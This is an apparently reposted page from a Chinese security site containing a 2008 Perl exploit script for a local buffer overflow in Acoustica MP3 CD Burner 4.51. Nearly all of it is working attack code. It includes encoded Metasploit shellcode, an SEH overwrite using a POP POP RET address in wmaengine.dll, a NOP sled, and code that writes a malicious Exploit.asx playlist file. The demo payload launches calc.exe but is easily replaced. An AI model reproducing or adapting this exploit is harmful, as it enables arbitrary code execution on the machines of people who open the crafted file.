| 
| 
 
| Acoustica MP3 CD Burner 4.51 Build 147 (asx file) Local BOF Exploit |   
| 来源:www.vfcocus.net 作者:Koshi 发布时间:2008-09-01 |   
| 
 
|  | #!/usr/bin/perl #
 # Acoustica MP3 CD Burner (asx file) Local BOF Exploit
 # Author: Koshi
 #
 # Date: 08-29-08 ( 0day )
 # Application: Acoustica MP3 CD Burner
 # Version: 4.51 Build 147 ( possibly older )
 # Site: http://acoustica.com/download.htm
 # Tested On: Windows XP SP3 Fully Patched
 #
 # Based off of n00b's findings http://www.milw0rm.com/exploits/4017
 # gr33tz: Rima my baby, str0ke, n00b ( nice find )
 
 
 # win32_exec -  EXITFUNC=process CMD=calc.exe Size=338 Encoder=Alpha2 http://metasploit.com
 my $shellcode =
 "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x49\x49".
 "\x49\x49\x49\x49\x48\x49\x49\x49\x49\x49\x49\x49\x51\x5a\x6a\x66".
 "\x58\x50\x30\x42\x31\x41\x42\x6b\x42\x41\x76\x42\x32\x42\x41\x32".
 "\x41\x41\x30\x41\x41\x58\x50\x38\x42\x42\x75\x49\x79\x4b\x4c\x4d".
 "\x38\x43\x74\x67\x70\x63\x30\x67\x70\x4c\x4b\x41\x55\x37\x4c\x6c".
 "\x4b\x41\x6c\x73\x35\x53\x48\x64\x41\x4a\x4f\x6c\x4b\x70\x4f\x67".
 "\x68\x6c\x4b\x41\x4f\x57\x50\x45\x51\x5a\x4b\x53\x79\x4e\x6b\x74".
 "\x74\x6c\x4b\x76\x61\x38\x6e\x64\x71\x59\x50\x6e\x79\x4e\x4c\x6b".
 "\x34\x79\x50\x63\x44\x73\x37\x4a\x61\x69\x5a\x44\x4d\x76\x61\x6b".
 "\x72\x7a\x4b\x4b\x44\x35\x6b\x50\x54\x77\x54\x65\x54\x71\x65\x4d".
 "\x35\x6e\x6b\x61\x4f\x64\x64\x65\x51\x7a\x4b\x63\x56\x4c\x4b\x56".
 "\x6c\x50\x4b\x4e\x6b\x43\x6f\x47\x6c\x65\x51\x6a\x4b\x6c\x4b\x55".
 "\x4c\x6c\x4b\x64\x41\x68\x6b\x6d\x59\x63\x6c\x45\x74\x75\x54\x59".
 "\x53\x36\x51\x4b\x70\x71\x74\x6e\x6b\x67\x30\x30\x30\x6f\x75\x6b".
 "\x70\x30\x78\x64\x4c\x4c\x4b\x37\x30\x44\x4c\x6e\x6b\x54\x30\x47".
 "\x6c\x6e\x4d\x6e\x6b\x53\x58\x75\x58\x6a\x4b\x76\x69\x4e\x6b\x6b".
 "\x30\x6c\x70\x37\x70\x47\x70\x35\x50\x4c\x4b\x50\x68\x57\x4c\x51".
 "\x4f\x35\x61\x6c\x36\x63\x50\x52\x76\x4f\x79\x6c\x38\x6b\x33\x6f".
 "\x30\x31\x6b\x36\x30\x33\x58\x73\x4e\x69\x48\x6b\x52\x44\x33\x55".
 "\x38\x6d\x48\x4b\x4e\x4d\x5a\x74\x4e\x50\x57\x4b\x4f\x48\x67\x71".
 "\x73\x62\x41\x32\x4c\x45\x33\x56\x4e\x55\x35\x61\x68\x31\x75\x75".
 "\x50\x66";
 
 my $bof = "A"x480;
 my $led = "\x90"x35;
 my $fill = "\x90"x150;
 my $buff = "".
 "$bof".
 "\xeb\x06\x90\x90". ### Pointer to next SEH record			   ###
 "\x65\x82\x19\x01". ### SE handler wmaengine.dll POP POP RET 0x01198265 ###
 "$led".
 "$shellcode".
 "$fill";
 
 my $tuff = "".
 "<ASX VERSION\=\x22\x33\x2e\x30\x22\x3e\n".
 "<ENTRY>\n".
 "<TITLE>Acoustica MP3 CD Burner Local BOF Exploit</TITLE>\n".
 "<REF HREF=\x22$buff.asf\x22\x2f\x3e\n".
 "</ENTRY>\n</ASX>\n";
 
 open (MYFILE, '>>Exploit.asx');
 binmode(MYFILE);
 print MYFILE "$tuff";
 close (MYFILE);
 print "Exploit file has been created. ( Exploit.asx )\n";
 
 
 |   
|  |  |   
| [  推荐] 
[  评论(0条)] 
[返回顶部] [打印本页] 
[关闭窗口] |   
|  |   
|  |  |  | 
| 
| 
|  |  | 推荐广告 |  |  |  
|  |  |